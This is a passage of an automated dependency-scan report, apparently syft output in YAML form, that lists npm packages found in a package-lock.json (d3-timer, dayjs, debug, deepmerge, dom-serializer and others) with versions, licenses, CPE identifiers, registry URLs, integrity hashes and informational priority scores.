cpe:2.3:a:d3-time:d3_time_format:4.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3_time:d3-time-format:4.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3_time:d3_time_format:4.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3:d3-time-format:4.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3:d3_time_format:4.1.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/d3-time-format@4.1.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/d3-time-format/-/d3-time-format-4.1.0.tgz integrity: sha512-dJxPBlzC7NugB2PDLwo9Q8JiTR3M3e4/XANkreKSUxF8vvXKqm1Yfq4Q5dl8budlunRVlUUaDUgFt7eA8D6NLg== dependencies: d3-time: 1 - 3 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 014411da08f2c5cc ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: d3-timer 3.0.1' title: d3-timer 3.0.1 description: 'Package discovered: d3-timer 3.0.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 1f58b04c062182d6 name: d3-timer version: 3.0.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:d3-timer:d3-timer:3.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3-timer:d3_timer:3.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3_timer:d3-timer:3.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3_timer:d3_timer:3.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3:d3-timer:3.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3:d3_timer:3.0.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/d3-timer@3.0.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/d3-timer/-/d3-timer-3.0.1.tgz integrity: sha512-ndfJ/JxxMd3nw31uyKoY2naivF+r29V+Lc0svZxe1JvvIRmi8hUsrMvdOwgS1o6uBHmiz91geQ0ylPP0aj1VUA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 8491d2589d2b26fe ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: dayjs 1.11.20' title: dayjs 1.11.20 description: 'Package discovered: dayjs 1.11.20' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 11ebb955a4940d8a name: dayjs version: 1.11.20 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:dayjs:dayjs:1.11.20:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/dayjs@1.11.20 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/dayjs/-/dayjs-1.11.20.tgz integrity: sha512-YbwwqR/uYpeoP4pu043q+LTDLFBLApUP6VxRihdfNTqu4ubqMlGDLd6ErXhEgsyvY0K6nCs7nggYumAN+9uEuQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 3e4836eb16baaf2c ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: debug 2.6.9' title: debug 2.6.9 description: 'Package discovered: debug 2.6.9' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 791d0c8d38a3b042 name: debug version: 2.6.9 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:debug_project:debug:2.6.9:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/debug@2.6.9 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/debug/-/debug-2.6.9.tgz integrity: sha512-bC7ElrdJaJnPbAP+1EotYvqZsb3ecl5wi6Bfi6BJTUcNowp6cvspg0jXznRTKDjm/E7AdgFBVeAPVMNcKGsHMA== dependencies: ms: 2.0.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: c3870af17f8e7246 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: debug 4.4.3' title: debug 4.4.3 description: 'Package discovered: debug 4.4.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 96b0606cb5228062 name: debug version: 4.4.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:debug_project:debug:4.4.3:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/debug@4.4.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/debug/-/debug-4.4.3.tgz integrity: sha512-RGwwWnwQvkVfavKVt22FGLw+xYSdzARwm0ru6DhTVA3umU5hZc28V3kO4stgYryrTlLpuvgI9GiijltAjNbcqA== dependencies: ms: ^2.1.3 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 6cb9876ddd023a8b ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: decamelize 1.2.0' title: decamelize 1.2.0 description: 'Package discovered: decamelize 1.2.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 56044f762e36d59b name: decamelize version: 1.2.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:decamelize:decamelize:1.2.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/decamelize@1.2.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/decamelize/-/decamelize-1.2.0.tgz integrity: sha512-z2S+W9X73hAUUki+N+9Za2lBlun89zigOyGrsax+KUQ6wKW4ZoWpEYBkGhQjwAjjDCkWxhY0VKEhk8wzY7F5cA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 2d9026954da43a27 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: decimal.js-light 2.5.1' title: decimal.js-light 2.5.1 description: 'Package discovered: decimal.js-light 2.5.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 6135efdaaf1822bb name: decimal.js-light version: 2.5.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:decimal.js-light:decimal.js-light:2.5.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:decimal.js-light:decimal.js_light:2.5.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:decimal.js_light:decimal.js-light:2.5.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:decimal.js_light:decimal.js_light:2.5.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:decimal.js:decimal.js-light:2.5.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:decimal.js:decimal.js_light:2.5.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/decimal.js-light@2.5.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/decimal.js-light/-/decimal.js-light-2.5.1.tgz integrity: sha512-qIMFpTMZmny+MMIitAB6D7iVPEorVw6YQRWkvarTkT4tBeSLLiHzcwj6q0MmYSFCiVpiqPJTJEYIrpcPzVEIvg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 8e421fc3fe27aa9c ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: deepmerge 4.3.1' title: deepmerge 4.3.1 description: 'Package discovered: deepmerge 4.3.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 6fcde9d497e83e33 name: deepmerge version: 4.3.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:deepmerge:deepmerge:4.3.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/deepmerge@4.3.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz integrity: sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: bd6d6c864c2f97b9 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: delayed-stream 1.0.0' title: delayed-stream 1.0.0 description: 'Package discovered: delayed-stream 1.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: c23340a58ec36159 name: delayed-stream version: 1.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:delayed-stream:delayed-stream:1.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:delayed-stream:delayed_stream:1.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:delayed_stream:delayed-stream:1.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:delayed_stream:delayed_stream:1.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:delayed:delayed-stream:1.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:delayed:delayed_stream:1.0.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/delayed-stream@1.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz integrity: sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: b4af690e8812705b ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: denque 2.1.0' title: denque 2.1.0 description: 'Package discovered: denque 2.1.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: b292c74570fb7df3 name: denque version: 2.1.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:denque:denque:2.1.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/denque@2.1.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/denque/-/denque-2.1.0.tgz integrity: sha512-HVQE3AAb/pxF8fQAoiqpvg9i3evqug3hoiwakOyZAwJm+6vZehbkYXZ0l4JxS+I3QxM97v5aaRNhj8v5oBhekw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 86dec3bfd9bed666 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: depd 2.0.0' title: depd 2.0.0 description: 'Package discovered: depd 2.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 82a407fce3facea3 name: depd version: 2.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:depd:depd:2.0.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/depd@2.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/depd/-/depd-2.0.0.tgz integrity: sha512-g7nH6P6dyDioJogAAGprGpCtVImJhpPk/roCzdb3fIh61/s/nPsfR6onyMwkCAR/OlC3yBC0lESvUoQEAssIrw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: a7d6bc7c01ff6fdb ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: destroy 1.2.0' title: destroy 1.2.0 description: 'Package discovered: destroy 1.2.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 916ee50fe6c61deb name: destroy version: 1.2.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:destroy:destroy:1.2.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/destroy@1.2.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/destroy/-/destroy-1.2.0.tgz integrity: sha512-2sJGJTaXIIaR1w4iJSNoN0hnMY7Gpc/n8D4qSCJw8QqFWXf7cuAgnEHxBpweaVcPevC2l3KpjYCx3NypQQgaJg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: b1baa34830820f96 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: detect-libc 2.1.2' title: detect-libc 2.1.2 description: 'Package discovered: detect-libc 2.1.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: cd3c75639d40cfa6 name: detect-libc version: 2.1.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:detect-libc:detect-libc:2.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:detect-libc:detect_libc:2.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:detect_libc:detect-libc:2.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:detect_libc:detect_libc:2.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:detect:detect-libc:2.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:detect:detect_libc:2.1.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/detect-libc@2.1.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/detect-libc/-/detect-libc-2.1.2.tgz integrity: sha512-Btj2BOOO83o3WyH59e8MgXsxEQVcarkUOpEYrubB0urwnN10yQ364rsiByU11nZlqWYZm05i/of7io4mzihBtQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: d9872bdf37f54c1c ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: dfa 1.2.0' title: dfa 1.2.0 description: 'Package discovered: dfa 1.2.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 32140b01170f2db8 name: dfa version: 1.2.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:dfa:dfa:1.2.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/dfa@1.2.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/dfa/-/dfa-1.2.0.tgz integrity: sha512-ED3jP8saaweFTjeGX8HQPjeC1YYyZs98jGNZx6IiBvxW7JG5v492kamAQB3m2wop07CvU/RQmzcKr6bgcC5D/Q== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 9f98c7e106363761 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: didyoumean 1.2.2' title: didyoumean 1.2.2 description: 'Package discovered: didyoumean 1.2.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 88295af7ba0997fd name: didyoumean version: 1.2.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:didyoumean:didyoumean:1.2.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/didyoumean@1.2.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/didyoumean/-/didyoumean-1.2.2.tgz integrity: sha512-gxtyfqMg7GKyhQmb056K7M3xszy/myH8w+B4RT+QXBQsvAOdc3XymqDDPHx1BgPgsdAA5SIifona89YtRATDzw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 1b1c014679b0d671 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: dijkstrajs 1.0.3' title: dijkstrajs 1.0.3 description: 'Package discovered: dijkstrajs 1.0.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 7a3b023286e84986 name: dijkstrajs version: 1.0.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:dijkstrajs:dijkstrajs:1.0.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/dijkstrajs@1.0.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/dijkstrajs/-/dijkstrajs-1.0.3.tgz integrity: sha512-qiSlmBq9+BCdCA/L46dw8Uy93mloxsPSbwnm5yrKn2vMPiy8KyAskTF6zuV/j5BMsmOGZDPs7KjU+mjb670kfA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 4fdc8b3106066f47 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: dlv 1.1.3' title: dlv 1.1.3 description: 'Package discovered: dlv 1.1.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 6145214b9f2f7148 name: dlv version: 1.1.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:dlv:dlv:1.1.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/dlv@1.1.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/dlv/-/dlv-1.1.3.tgz integrity: sha512-+HlytyjlPKnIG8XuRG8WvmBP8xs8P71y+SKKS6ZXWoEgLuePxtDoUEiH7WkdePWrQ5JBpE6aoVqfZfJUQkjXwA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 4d01289dd001e612 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: dom-helpers 5.2.1' title: dom-helpers 5.2.1 description: 'Package discovered: dom-helpers 5.2.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 22b93db9f5eba040 name: dom-helpers version: 5.2.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:dom-helpers:dom-helpers:5.2.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:dom-helpers:dom_helpers:5.2.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:dom_helpers:dom-helpers:5.2.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:dom_helpers:dom_helpers:5.2.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:dom:dom-helpers:5.2.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:dom:dom_helpers:5.2.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/dom-helpers@5.2.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/dom-helpers/-/dom-helpers-5.2.1.tgz integrity: sha512-nRCa7CK3VTrM2NmGkIy4cbK7IZlgBE/PYMn55rrXefr5xXDP0LdtfPnblFDoVdcAfslJ7or6iqAUnx0CCGIWQA== dependencies: '@babel/runtime': ^7.8.7 csstype: ^3.0.2 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 594471832719edc2 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: dom-serializer 2.0.0' title: dom-serializer 2.0.0 description: 'Package discovered: dom-serializer 2.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: f8e1d8922cf56c54 name: dom-serializer version: 2.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:dom-serializer:dom-serializer:2.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:dom-serializer:dom_serializer:2.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:dom_serializer:dom-serializer:2.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:dom_serializer:dom_serializer:2.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:dom:dom-serializer:2.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:dom:dom_serializer:2.0.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/dom-serializer@2.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/dom-serializer/-/dom-serializer-2.0.0.tgz integrity: sha512-wIkAryiqt/nV5EQKqQpo3SToSOV9J0DnbJqwK7Wv/Trc92zIAYZ4FlMu+JPFW1DfGFt81ZTCGgDEabffXeLyJg== dependencies: domelementtype: ^2.3.0 domhandler: ^5.0.2 entities: ^4.2.0 compliance: cisControlsV8_1: 